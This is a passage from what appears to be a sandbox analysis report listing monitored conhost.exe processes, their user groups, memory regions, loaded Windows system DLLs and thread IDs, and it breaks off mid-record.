cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1870 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1871 start_va = 0x7edc880000 end_va = 0x7edc89ffff entry_point = 0x0 region_type = private name = "private_0x0000007edc880000" filename = "" Region: id = 1872 start_va = 0x7edc8a0000 end_va = 0x7edc8b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007edc8a0000" filename = "" Region: id = 1873 start_va = 0x7edc8c0000 end_va = 0x7edc8fffff entry_point = 0x0 region_type = private name = "private_0x0000007edc8c0000" filename = "" Region: id = 1874 start_va = 0x7df5fffa0000 end_va = 0x7ff5fff9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffa0000" filename = "" Region: id = 1875 start_va = 0x7ff6c3e90000 end_va = 0x7ff6c3eb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e90000" filename = "" Region: id = 1876 start_va = 0x7ff6c3ebd000 end_va = 0x7ff6c3ebefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ebd000" filename = "" Region: id = 1877 start_va = 0x7ff6c3ebf000 end_va = 0x7ff6c3ebffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ebf000" filename = "" Region: id = 1878 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1879 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1880 start_va = 0x7edc960000 end_va = 0x7edca5ffff entry_point = 0x0 region_type = private name = "private_0x0000007edc960000" filename = "" Region: id = 1881 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1882 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3186 start_va = 0x7edc880000 end_va = 0x7edc88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007edc880000" filename = "" Region: id = 3187 start_va = 0x7edc890000 end_va = 0x7edc896fff entry_point = 0x0 region_type = private name = "private_0x0000007edc890000" filename = "" Region: id = 3188 start_va = 0x7edc900000 end_va = 0x7edc93ffff entry_point = 0x0 region_type = private name = "private_0x0000007edc900000" filename = "" Region: id = 3189 start_va = 0x7edc940000 end_va = 0x7edc940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007edc940000" filename = "" Region: id = 3190 start_va = 0x7edc950000 end_va = 0x7edc956fff entry_point = 0x0 region_type = private name = "private_0x0000007edc950000" filename = "" Region: id = 3191 start_va = 0x7edca60000 end_va = 0x7edcb1dfff entry_point = 0x7edca60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3192 start_va = 0x7edcb20000 end_va = 0x7edcca7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007edcb20000" filename = "" Region: id = 3193 start_va = 0x7edccb0000 end_va = 0x7edccbffff entry_point = 0x0 region_type = private name = "private_0x0000007edccb0000" filename = "" Region: id = 3194 start_va = 0x7edccc0000 end_va = 0x7edce40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007edccc0000" filename = "" Region: id = 3195 start_va = 0x7edce50000 end_va = 0x7ede24ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007edce50000" filename = "" Region: id = 3196 start_va = 0x7ede250000 end_va = 0x7ede250fff entry_point = 0x0 region_type = private name = "private_0x0000007ede250000" filename = "" Region: id = 3197 start_va = 0x7ede260000 end_va = 0x7ede260fff entry_point = 0x0 region_type = private name = "private_0x0000007ede260000" filename = "" Region: id = 3198 start_va = 0x7ff6c3d90000 end_va = 0x7ff6c3e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d90000" filename = "" Region: id = 3199 start_va = 0x7ff6c3ebb000 end_va = 0x7ff6c3ebcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ebb000" filename = "" Region: id = 3200 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3201 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3202 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3203 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3204 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3205 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3206 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3207 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3208 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3209 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3210 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3211 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4310 start_va = 0x7edc8e0000 end_va = 0x7edc8effff entry_point = 0x0 region_type = private name = "private_0x0000007edc8e0000" filename = "" Region: id = 4311 start_va = 0x7ede270000 end_va = 0x7ede2affff entry_point = 0x0 region_type = private name = "private_0x0000007ede270000" filename = "" Region: id = 4312 start_va = 0x7ede2b0000 end_va = 0x7ede2effff entry_point = 0x0 region_type = private name = "private_0x0000007ede2b0000" filename = "" Region: id = 4313 start_va = 0x7ede350000 end_va = 0x7ede35ffff entry_point = 0x0 region_type = private name = "private_0x0000007ede350000" filename = "" Region: id = 4314 start_va = 0x7ede360000 end_va = 0x7ede696fff entry_point = 0x7ede360000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4315 start_va = 0x7ede6a0000 end_va = 0x7ede8b0fff entry_point = 0x0 region_type = private name = "private_0x0000007ede6a0000" filename = "" Region: id = 4316 start_va = 0x7ede8c0000 end_va = 0x7edead3fff entry_point = 0x0 region_type = private name = "private_0x0000007ede8c0000" filename = "" Region: id = 4317 start_va = 0x7edeae0000 end_va = 0x7edebe8fff entry_point = 0x0 region_type = private name = "private_0x0000007edeae0000" filename = "" Region: id = 4318 start_va = 0x7edebf0000 end_va = 0x7edee01fff entry_point = 0x0 region_type = private name = "private_0x0000007edebf0000" filename = "" Region: id = 4319 start_va = 0x7edee10000 end_va = 0x7edef23fff entry_point = 0x0 region_type = private name = "private_0x0000007edee10000" filename = "" Region: id = 4320 start_va = 0x7ff6c3eb9000 end_va = 0x7ff6c3ebafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3eb9000" filename = "" Region: id = 4321 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4322 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4323 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4324 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4325 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4326 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4327 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4328 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4329 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 114 os_tid = 0xe7c Thread: id = 161 os_tid = 0xfd0 Thread: id = 231 os_tid = 0x10a0 Thread: id = 289 os_tid = 0x11b4 Process: id = "84" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf56f000" os_pid = "0xe80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0xd1c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1883 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1884 start_va = 0xa9cede0000 end_va = 0xa9cedfffff entry_point = 0x0 region_type = private name = "private_0x000000a9cede0000" filename = "" Region: id = 1885 start_va = 0xa9cee00000 end_va = 0xa9cee13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9cee00000" filename = "" Region: id = 1886 start_va = 0xa9cee20000 end_va = 0xa9cee5ffff entry_point = 0x0 region_type = private name = "private_0x000000a9cee20000" filename = "" Region: id = 1887 start_va = 0x7df5ffe60000 end_va = 0x7ff5ffe5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe60000" filename = "" Region: id = 1888 start_va = 0x7ff6c4760000 end_va = 0x7ff6c4782fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4760000" filename = "" Region: id = 1889 start_va = 0x7ff6c478d000 end_va = 0x7ff6c478dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c478d000" filename = "" Region: id = 1890 start_va = 0x7ff6c478e000 end_va = 0x7ff6c478ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c478e000" filename = "" Region: id = 1891 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1892 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1893 start_va = 0xa9cee80000 end_va = 0xa9cef7ffff entry_point = 0x0 region_type = private name = "private_0x000000a9cee80000" filename = "" Region: id = 1894 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1895 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3212 start_va = 0xa9cede0000 end_va = 0xa9cedeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9cede0000" filename = "" Region: id = 3213 start_va = 0xa9cedf0000 end_va = 0xa9cedf6fff entry_point = 0x0 region_type = private name = "private_0x000000a9cedf0000" filename = "" Region: id = 3214 start_va = 0xa9cee60000 end_va = 0xa9cee60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9cee60000" filename = "" Region: id = 3215 start_va = 0xa9cee70000 end_va = 0xa9cee76fff entry_point = 0x0 region_type = private name = "private_0x000000a9cee70000" filename = "" Region: id = 3216 start_va = 0xa9cef80000 end_va = 0xa9cf03dfff entry_point = 0xa9cef80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3217 start_va = 0xa9cf040000 end_va = 0xa9cf07ffff entry_point = 0x0 region_type = private name = "private_0x000000a9cf040000" filename = "" Region: id = 3218 start_va = 0xa9cf080000 end_va = 0xa9cf080fff entry_point = 0x0 region_type = private name = "private_0x000000a9cf080000" filename = "" Region: id = 3219 start_va = 0xa9cf090000 end_va = 0xa9cf090fff entry_point = 0x0 region_type = private name = "private_0x000000a9cf090000" filename = "" Region: id = 3220 start_va = 0xa9cf150000 end_va = 0xa9cf15ffff entry_point = 0x0 region_type = private name = "private_0x000000a9cf150000" filename = "" Region: id = 3221 start_va = 0xa9cf160000 end_va = 0xa9cf2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9cf160000" filename = "" Region: id = 3222 start_va = 0xa9cf2f0000 end_va = 0xa9cf470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9cf2f0000" filename = "" Region: id = 3223 start_va = 0xa9cf480000 end_va = 0xa9d087ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9cf480000" filename = "" Region: id = 3224 start_va = 0x7ff6c4660000 end_va = 0x7ff6c475ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4660000" filename = "" Region: id = 3225 start_va = 0x7ff6c478b000 end_va = 0x7ff6c478cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c478b000" filename = "" Region: id = 3226 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3227 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3228 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3229 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3230 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3231 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3232 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3233 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3234 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3235 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3236 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3237 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4285 start_va = 0xa9cee30000 end_va = 0xa9cee3ffff entry_point = 0x0 region_type = private name = "private_0x000000a9cee30000" filename = "" Region: id = 4286 start_va = 0xa9cf0a0000 end_va = 0xa9cf0dffff entry_point = 0x0 region_type = private name = "private_0x000000a9cf0a0000" filename = "" Region: id = 4287 start_va = 0xa9cf0e0000 end_va = 0xa9cf11ffff entry_point = 0x0 region_type = private name = "private_0x000000a9cf0e0000" filename = "" Region: id = 4288 start_va = 0xa9d0880000 end_va = 0xa9d0988fff entry_point = 0x0 region_type = private name = "private_0x000000a9d0880000" filename = "" Region: id = 4289 start_va = 0xa9d09e0000 end_va = 0xa9d09effff entry_point = 0x0 region_type = private name = "private_0x000000a9d09e0000" filename = "" Region: id = 4290 start_va = 0xa9d09f0000 end_va = 0xa9d0d26fff entry_point = 0xa9d09f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4291 start_va = 0xa9d0d30000 end_va = 0xa9d0f49fff entry_point = 0x0 region_type = private name = "private_0x000000a9d0d30000" filename = "" Region: id = 4292 start_va = 0xa9d0f50000 end_va = 0xa9d116ffff entry_point = 0x0 region_type = private name = "private_0x000000a9d0f50000" filename = "" Region: id = 4293 start_va = 0xa9d1170000 end_va = 0xa9d138afff entry_point = 0x0 region_type = private name = "private_0x000000a9d1170000" filename = "" Region: id = 4294 start_va = 0xa9d1390000 end_va = 0xa9d149ffff entry_point = 0x0 region_type = private name = "private_0x000000a9d1390000" filename = "" Region: id = 4295 start_va = 0x7ff6c4789000 end_va = 0x7ff6c478afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4789000" filename = "" Region: id = 4296 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4297 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4298 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4299 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4300 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4301 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4302 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4303 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4304 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 115 os_tid = 0xe84 Thread: id = 162 os_tid = 0xfd4 Thread: id = 232 os_tid = 0x10a4 Thread: id = 288 os_tid = 0x11b0 Process: id = "85" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf51a000" os_pid = "0xe88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0xd24" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1896 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1897 start_va = 0x6fb9f40000 end_va = 0x6fb9f5ffff entry_point = 0x0 region_type = private name = "private_0x0000006fb9f40000" filename = "" Region: id = 1898 start_va = 0x6fb9f60000 end_va = 0x6fb9f73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006fb9f60000" filename = "" Region: id = 1899 start_va = 0x6fb9f80000 end_va = 0x6fb9fbffff entry_point = 0x0 region_type = private name = "private_0x0000006fb9f80000" filename = "" Region: id = 1900 start_va = 0x7df5ff080000 end_va = 0x7ff5ff07ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff080000" filename = "" Region: id = 1901 start_va = 0x7ff6c4550000 end_va = 0x7ff6c4572fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4550000" filename = "" Region: id = 1902 start_va = 0x7ff6c457d000 end_va = 0x7ff6c457efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c457d000" filename = "" Region: id = 1903 start_va = 0x7ff6c457f000 end_va = 0x7ff6c457ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c457f000" filename = "" Region: id = 1904 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1905 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1906 start_va = 0x6fba150000 end_va = 0x6fba24ffff entry_point = 0x0 region_type = private name = "private_0x0000006fba150000" filename = "" Region: id = 1907 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1908 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3160 start_va = 0x6fb9f40000 end_va = 0x6fb9f4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006fb9f40000" filename = "" Region: id = 3161 start_va = 0x6fb9f50000 end_va = 0x6fb9f56fff entry_point = 0x0 region_type = private name = "private_0x0000006fb9f50000" filename = "" Region: id = 3162 start_va = 0x6fb9fc0000 end_va = 0x6fba07dfff entry_point = 0x6fb9fc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3163 start_va = 0x6fba080000 end_va = 0x6fba0bffff entry_point = 0x0 region_type = private name = "private_0x0000006fba080000" filename = "" Region: id = 3164 start_va = 0x6fba0c0000 end_va = 0x6fba0c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006fba0c0000" filename = "" Region: id = 3165 start_va = 0x6fba0d0000 end_va = 0x6fba0d6fff entry_point = 0x0 region_type = private name = 